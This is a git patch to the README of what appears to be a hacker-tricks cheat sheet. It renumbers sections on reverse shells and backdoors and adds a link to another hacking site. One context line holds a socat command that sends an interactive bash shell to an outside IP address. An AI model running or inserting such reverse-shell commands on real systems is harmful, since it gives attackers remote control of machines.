From 2f1a334955c3ea6a32090eb3120d537fbca895ac Mon Sep 17 00:00:00 2001
From: SkyperTHC <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 13 Sep 2022 23:57:31 +0100
Subject: [PATCH] Update README.md
---
README.md | 15 +++++++++++----
1 file changed, 11 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 1b967d4..841e66e 100644
--- a/README.md
+++ b/README.md
@@ -36,7 +36,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor)
1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor)
1. [File transfer using gs-netcat and sftp](#ftgs-anchor)
-1. [Reverse Shell / Dumb Shell](#rs-anchor)
+1. [Reverse Shell / Dumb Shell](#reverse)
1. [Reverse Shells](#rs-anchor)
1. [with gs-netcat](#rswg-anchor)
1. [with Bash](#rswb-anchor)
@@ -76,7 +76,8 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Tools of the trade](#tools)
1. [Cool Linux commands](#cool-anchor)
1. [tmux](#tmux-anchor)
- 1. [Useful commands](#useful-anchor)
+ 1. [Useful commands](#useful-anchor)
+1. [Other Sites](#others)
@@ -482,7 +483,8 @@ sftp -D gs-netcat # Workstation
```
---
-
+
+## 5. Reverse Shells
**5.i.a. Reverse shell with gs-netcat**
@@ -616,7 +618,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524
---
-## Backdoors
+## 6. Backdoors
Mostly we use gs-netcat's automated deployment script: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy).
```sh
@@ -1006,4 +1008,9 @@ Example for *SSH*:
rlwrap --always-readline ssh user@host
```
---
+
+## 12. Other Sites
+
+1. https://book.hacktricks.xyz/welcome/readme
+
Shoutz: ADM, subz/#9x, DrWho